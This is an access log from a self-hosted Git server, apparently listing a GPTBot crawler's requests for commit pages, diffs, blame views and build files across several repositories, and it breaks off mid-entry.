"/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fdocker-compose.yml" [Client 74.7.227.38] [Length 23763] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" -[17/Feb/2026:14:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fmain.py" [Client 74.7.227.38] [Length 49565] [Gzip 8.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" -[17/Feb/2026:14:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2f.venv" [Client 74.7.227.38] [Length 19370] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" -[17/Feb/2026:14:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb.diff" [Client 74.7.227.38] [Length 128761] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" -[17/Feb/2026:14:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:14:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:14:51:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/favicon.ico" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:14:51:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/bearing.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:14:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fdocker-compose.yml" [Client 74.7.227.38] [Length 22574] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:14:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode" [Client 74.7.227.38] [Length 10335] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:14:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main" [Client 74.7.227.38] [Length 15467] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/graph" -[17/Feb/2026:14:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main" [Client 74.7.227.38] [Length 5324] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/branches" -[17/Feb/2026:14:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml" [Client 74.7.227.38] [Length 96315] [Gzip 10.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:14:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 22510] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" -[17/Feb/2026:14:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fglobal.json" [Client 74.7.227.38] [Length 21270] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" -[17/Feb/2026:14:51:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode" -[17/Feb/2026:14:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.vscode" -[17/Feb/2026:14:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/branch/main" [Client 74.7.227.38] [Length 7460] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:14:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19491] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" -[17/Feb/2026:14:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10873] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" -[17/Feb/2026:14:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19490] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" -[17/Feb/2026:14:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" -[17/Feb/2026:14:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" -[17/Feb/2026:14:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" -[17/Feb/2026:14:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" [Client 74.7.227.38] [Length 9862] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" -[17/Feb/2026:14:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" -[17/Feb/2026:14:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 24633] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" -[17/Feb/2026:14:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" -[17/Feb/2026:14:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0" [Client 74.7.227.38] [Length 25379] [Gzip 5.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:14:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21649] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11872] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21337] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11302] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14157] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11145] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21646] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14724] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11065] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10229] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 